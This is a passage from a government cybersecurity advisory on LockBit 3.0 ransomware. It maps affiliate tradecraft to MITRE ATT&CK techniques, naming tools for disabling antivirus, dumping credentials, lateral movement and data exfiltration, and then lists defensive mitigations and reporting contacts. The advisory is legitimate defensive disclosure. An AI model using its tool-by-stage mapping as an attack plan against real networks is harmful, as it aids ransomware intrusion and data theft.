Impair Defenses: Disable or Modify Tools	T1562.001	LockBit 3.0 affiliates use Backstab, Defender Control, GMER, PCHunter, PowerTool, Process Hacker or TDSSKiller to disable EDR processes and services. LockBit 3.0 affiliates use Bat Armor to bypass the PowerShell execution Policy. LockBit affiliates may deploy a batch script, 123.bat, to disable and uninstall antivirus software. Lockbit 3.0 may modify and/or disable security tools including EDR and antivirus to avoid possible detection of malware, tools, and activities.
Indicator Removal: Clear Windows Event Logs	T1070.001	LockBit executable clears the Windows Event Logs files.
Indicator Removal: File Deletion	T1070.004	LockBit 3.0 will delete itself from the disk.
Obfuscated Files or Information	T1027	LockBit 3.0 will send encrypted host and bot information to its command and control (C2) servers.
Obfuscated Files or Information: Software Packing	T1027.002	LockBit affiliates may perform software packing or virtual machine software protection to conceal their code. Blister Loader has been used for such purpose.

Table 10: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Credential Access

Technique Title	ID	Use
Brute Force	T1110	LockBit affiliates may leverage VPN or RDP brute force credentials as an initial access.
Credentials from Password Stores: Credentials from Web Browsers	T1555.003	LockBit 3.0 actors use PasswordFox to recover passwords from Firefox Browser.
OS Credential Dumping	T1003	LockBit 3.0 actors use ExtPassword or LostMyPassword to recover passwords from Windows systems.
OS Credential Dumping: LSASS Memory	T1003.001	LockBit affiliates may use Microsoft Sysinternals ProDump to dump the contents of lsass.exe. LockBit affiliates have used Mimikatz to dump credentials.

Table 11: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Discovery

Technique Title	ID	Use
Network Service Discovery	T1046	LockBit affiliates use SoftPerfect Network Scanner, Advanced IP Scanner, or Advanced Port Scanner to scan target networks. LockBit affiliates may use SoftPerfect Network Scanner, Advanced Port Scanner, and AdFind to enumerate connected machines in the network.
System Information Discovery	T1082	LockBit affiliates will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices.
System Location Discovery: System Language Discovery	T1614.001	LockBit 3.0 will not infect machines with language settings that match a defined exclusion list.

Table 12: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Lateral Movement

Technique Title	ID	Use
Lateral Movement	TA0008	LockBit affiliates will laterally move across networks and access domain controllers.
Remote Services: Remote Desktop Protocol	T1021.001	LockBit affiliates use Splashtop remote-desktop software to facilitate lateral movement.
Remote Services: Server Message Block (SMB)/Admin Windows Shares	T1021.002	LockBit affiliates may use Cobalt Strike and target SMB shares for lateral movement.

Table 13: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Collection

Technique Title	ID	Use
Archive Collected Data: Archive via Utility	T1560.001	LockBit affiliates may use 7-zip to compress and/or encrypt collected data prior to exfiltration.

Table 14: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Command and Control

Technique Title	ID	Use
Application Layer Protocol: File Transfer Protocols	T1071.002	LockBit affiliates may use FileZilla for C2.
Application Layer Protocol: Web Protocols	T1071.001	LockBit affiliates use ThunderShell as a remote access tool that communicates via HTTP requests.
Non-Application Layer Protocol	T1095	LockBit affiliates use Ligolo to establish SOCKS5 or TCP tunnels from a reverse connection.
Protocol Tunneling	T1572	LockBit affiliates use Plink to automate SSH actions on Windows.
Remote Access Software	T1219	LockBit 3.0 actors use AnyDesk, Atera RMM, ScreenConnect or TeamViewer for C2.

Table 15: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Exfiltration

Technique Title	ID	Use
Exfiltration	TA0010	LockBit affiliates use StealBit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network.
Exfiltration Over Web Service	T1567	LockBit affiliates use publicly available file sharing services to exfiltrate a target’s data.
Exfiltration Over Web Service: Exfiltration to Cloud Storage	T1567.002	LockBit affiliates use (1) Rclone, an open-source command line cloud storage manager or FreeFileSync to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration.

Table 16: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Impact

Technique Title	ID	Use
Data Destruction	T1485	LockBit 3.0 deletes log files and empties the recycle bin.
Data Encrypted for Impact	T1486	LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources. LockBit affiliates can encrypt Windows and Linux devices, as well as VMware instances.
Defacement: Internal Defacement	T1491.001	LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively.
Inhibit System Recovery	T1490	LockBit 3.0 deletes volume shadow copies residing on disk.
Service Stop	T1489	LockBit 3.0 terminates processes and services.

Mitigations

The authoring organizations recommend implementing the mitigations listed below to improve their cybersecurity posture to better defend against LockBit’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

The listed mitigations are ordered by MITRE ATT&CK tactic. Mitigations that apply to multiple MITRE ATT&CK tactics are listed under the tactic that occurs earliest in an incident’s lifecycle. For example, account use polices are mitigations for initial access, persistence, privilege escalation, and credential access but would be listed under initial access mitigations.

Initial Access

Consider implementing sandboxed browsers to protect systems from malware originating from web browsing. Sandboxed browsers isolate the host machine from malicious code.
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST standards for developing and managing password policies [CPG 2.L].
- Enforce use of longer passwords consisting of at least 15 characters in length [CPG 2.B, 2.C].
- Store passwords in a salted and hashed format using industry-recognized password hashing algorithms.
- Prevent use of commonly used or known-compromised passwords [CPG 2.C].
- Implement multiple failed login attempt account lockouts [CPG 2.G].
- Disable password “hints.”
- Refrain from requiring password changes more frequently than once per year.
  Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software [CPG 2.Q].
Implement filters at the email gateway to filter out emails with known malicious indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall [CPG 2.M].
Install a web application firewall and configure with appropriate rules to protect enterprise assets.
Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Isolate web-facing applications to further minimize the spread of ransomware across a network [CPG 2.F].
Follow the least-privilege best practice by requiring administrators to use administrative accounts for managing systems and use simple user accounts for non-administrative tasks [CPG 2.E].
Enforce the management of and audit user accounts with administrative privileges. Configure access controls according to the principle of least privilege [CPG 2.E].
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Public-facing applications must be patched in a timely manner as vulnerabilities can often be exploited directly by the threat actor. By closely monitoring the threat landscape, threat actors often take advantage of vulnerabilities before systems are patched. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours from when a vulnerability is disclosed. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
Restrict service accounts from remotely accessing other systems. Configure group policy to Deny log on locally, Deny log on through Terminal Services, and Deny access to this computer from the network for all service accounts to limit the ability for compromised service accounts to be used for lateral movement.
Block direct internet access for administration interfaces (e.g., application protocol interface (API)) and for remote access.
Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks, and privileged accounts that access critical systems [CPG 2.H].
Consolidate, monitor, and defend internet gateways.
Install, regularly update, and enable real-time detection for antivirus software on all hosts.
Raise awareness for phishing threats in your organization. Phishing is one of the primary infection vectors in ransomware campaigns, and all employees should receive practical training on the risks associated with the regular use of email. With the rise of sophisticated phishing methods, such as using stolen email communication or artificial intelligence (AI) systems such as ChatGPT, the distinction between legitimate and malicious emails becomes more complex. This particularly applies to employees from corporate divisions that have to deal with a high volume of external email communication (e.g., staff recruitment) [CPG 2.I, 2.J].
Consider adding an external email warning banner for emails sent to or received from outside of your organization [CPG 2.M].
Review internet-facing services and disable any services that are no longer a business requirement to be exposed or restrict access to only those users with an explicit requirement to access services, such as SSL, VPN, or RDP. If internet-facing services must be used, control access by only allowing access from an admin IP range [CPG 2.X].
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Regularly verify the security level of the Active Directory domain by checking for misconfigurations.

Execution

Develop and regularly update comprehensive network diagram(s) that describes systems and data flows within your organization’s network(s) [CPG 2.P].
Control and restrict network connections accordingly with a network flow matrix.
Enable enhanced PowerShell logging [CPG 2.T, 2.U].
- PowerShell logs contain valuable data, including historical OS, registry interaction, and possibility of a threat actor’s PowerShell use.
- Ensure PowerShell instances are configured to use the latest version, and have module, script block, and transcription logging enabled (enhanced logging).
- The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. It is recommended to turn on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as reasonably practical.
Configure the Windows Registry to require UAC approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.

Privilege Escalation

Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.N].
Enable Credential Guard to protect your Windows system credentials. This is enabled by default on Windows 11 Enterprise 22H2 and Windows 11 Education 22H2. Credential Guard prevents credential dumping techniques of the Local Security Authority (LSA) secrets. Be aware that enabling this security control has some downsides. In particular, you can no longer use New Technology Local Area Network (LAN) Manager (NTLM) classic authentication single sign-on, Kerberos unconstrained delegation, as well as Data Encryption Standard (DES) encryption.
Implement Local Administrator Password Solution (LAPS) where possible if your OS is older than Windows Server 2019 and Windows 10 as these versions do not have LAPS built in. NOTE: The authoring organizations recommend organizations upgrade to Windows Server 2019 and Windows 10 or greater.

Defense Evasion

Apply local security policies to control application execution (e.g., Software Restriction Policies (SRP), AppLocker, Windows Defender Application Control (WDAC)) with a strict allowlist.
Establish an application allowlist of approved software applications and binaries that are allowed to be executed on a system. This measure prevents unwanted software to be run. Usually, application allowlist software can also be used to define blocklists so that the execution of certain programs can be blocked, for example cmd.exe or PowerShell.exe [CPG 2.Q].

Credential Access

Restrict NTLM uses with security policies and firewalling.

Discovery

Disable unused ports. Disable ports that are not being used for business purposes (e.g., RDP-TCP Port 3389). Close unused RDP ports.

Lateral Movement

Identify Active Directory control paths and eliminate the most critical among them according to the business needs and assets.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 1.E]. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.

Command and Control

Implement a tiering model by creating trust zones dedicated to an organization’s most sensitive assets.
VPN access should not be considered as a trusted network zone. Organizations should instead consider moving to zero trust architectures.

Exfiltration

Block connections to known malicious systems by using a Transport Layer Security (TLS) Proxy. Malware often uses TLS to communicate with the infrastructure of the threat actor. By using feeds for known malicious systems, the establishment of a connection to a C2 server can be prevented.
Use web filtering or a Cloud Access Security Broker (CASB) to restrict or monitor access to public-file sharing services that may be used to exfiltrate data from a network.

Impact

Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.R].
Maintain offline backups of data, and regularly maintain backup and restoration (daily or weekly at the minimum). By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data [CPG 2.R]. ACSC recommends organizations follow the 3-2-1 backup strategy in which organizations have three copies of data (one copy of production data and two backup copies) on two different media, such as disk and tape, with one copy kept off-site for disaster recovery.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.R].

Implement Mitigations for Defense-in-Depth

Implementing multiple mitigations within a defense-in-depth approach can help protect against ransomware, such as LockBit. CERT NZ explains How ransomware happens and how to stop it by applying mitigations, or critical controls, to provide a stronger defense to detect, prevent, and respond to ransomware before an organization’s data is encrypted. By understanding the most common attack vectors, organizations can identify gaps in network defenses and implement the mitigations noted in this advisory to harden organizations against ransomware attacks. In Figure 3, a ransomware attack is broken into three phases:

Initial Access where the cyber actor is looking for a way into a network.
Consolidation and Preparation when the actor is attempting to gain access to all devices.
Impact on Target where the actor is able to steal and encrypt data and then demand ransom.

Figure 3 shows the mitigations/critical controls, as various colored hexagons, working together to stop a ransomware attacker from accessing a network to steal and encrypt data. In the Initial Access phase, mitigations working together to deny an attacker network access include securing internet-exposed services, patching devices, implementing MFA, disabling macros, employing application allowlisting, and using logging and alerting. In the Consolidation and Preparation phase, mitigations working together to keep an attacker from accessing network devices are patching devices, using network segmentation, enforcing the principle of least privilege, implementing MFA, and using logging and alerting. Finally, in the Impact on Target phase, mitigations working together to deny or degrade an attacker’s ability to steal and/or encrypt data includes using logging and alerting, using and maintaining backups, and employing application allowlisting.

Critical Controls Key

Figure 3: Stopping Ransomware Using Layered Mitigations

Validate Security Controls

In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see Tables 5-16).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

ACSC:
- See 2023-03: ACSC Ransomware Profile – LockBit 3.0 for additional information.
CISA:
- Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
- Information on no-cost cyber hygiene services is available at Cyber Hygiene Services and Ransomware Readiness Assessment.
CISA, NSA, FBI, and MS-ISAC:
- See the #StopRansomware Guide developed through the Joint Ransomware Task Force (JRTF) to provide a one-stop resource to help organizations reduce the risk of ransomware incidents through best practices to detect, prevent, respond, and recover, including step-by-step approaches to address potential attacks.
FBI and CISA:
- See Alert AA23-075A – #StopRansomware: LockBit 3.0 for information on IOCs and TTPs identified through FBI investigations as recently as March 2023.
MS-ISAC:
- See the Center for Internet Security (CIS) Critical Security Controls (CIS Controls) https://www.cisecurity.org/insights/white-papers/cis-community-defense-model-2-0for information on strengthening an organization’s cybersecurity posture through implementing a prescriptive, prioritized, and simplified set of best.
- See the CIS Community Defense Model 2.0 (CDM 2.0) for the effectiveness of the CIS Controls against the most prevalent types of attacks and how CDM 2.0 can be used to design, prioritize, implement, and improve an organization’s cybersecurity program.
- See Blueprint for Ransomware Defense for a clear, actionable framework for ransomware mitigation, response, and recovery built around the CIS Controls.
NCSC-UK
- See guidance on Mitigating malware and ransomware attacks for information on defending organizations against malware or ransomware attacks.
BSI:
- See BSI’s Ransomware – Facts and Defense Strategies for a comprehensive collection of resources on ransomware prevention, detection, and reaction. Note: These resources are in German.
CCCS:
- See CCCS’s Ransomware playbook (ITSM.00.099) for information on ransomware prevention and response.
- See CCCS’s Top 10 IT security actions based on analysis of cyber threat trends to help minimize intrusions or the impacts of a successful cyber intrusion.
CERT NZ:
- See CERT NZ’s Security awareness building and Creating an effective security awareness program to assist organization’s in providing adequate security awareness and training to personnel while creating a positive security culture.
- Businesses can find information on developing an incident response plan, creating a contact list, and communicating ransomware incidents at CERT NZ’s Creating an incident response plan.
NCSC NZ:
- For guidance on ransomware for public service agencies, see NCSC NZ’s Ransomware: Your organization should be both protected and prepared.

Reporting

The authoring organizations do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the authoring organizations urge you to promptly report ransomware incidents to your country’s respective authorities.

Australia: Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
Canada: Canadian victims of ransomware are encouraged to consider reporting cyber incidents to law enforcement (e.g., local police or the Canadian Anti-Fraud Centre) as well as to the Canadian Centre for Cyber Security online via My Cyber Portal.
France:
- Individuals and small organizations can seek assistance with Cybermalveillance – https://www.cybermalveillance.gouv.fr/.
- Larger organizations, as well as public and regulated entities, can request assistance from CERT-FR via cert-fr@ssi.gouv.fr.
Germany: German victims of ransomware are encouraged to consider reporting cyber incidents to law enforcement (e.g., local police or the Central Contact Point for Cybercrime as well as to the Federal Office for Information Security (BSI) via the Reporting and Information Portal.
New Zealand: New Zealand organizations and businesses can report security incidents to the NCSC at incidents@ncsc.govt.nz or call 04 498 7654, or to CERT NZ through https://www.cert.govt/nz/it-specialists/report-an-incident/ or to ir@ops.cert.govt.nz.
United States:
- Report ransomware incidents to a local FBI Field Office or CISA’s 24/7 Operations Center at Report@cisa.dhs.gov, cisa.gov/report, or (888) 282-0870. When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
- For SLTTs, email soc@msisac.org or call (866) 787-4722.
United Kingdom: UK organizations should report any suspected compromises to NCSC.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.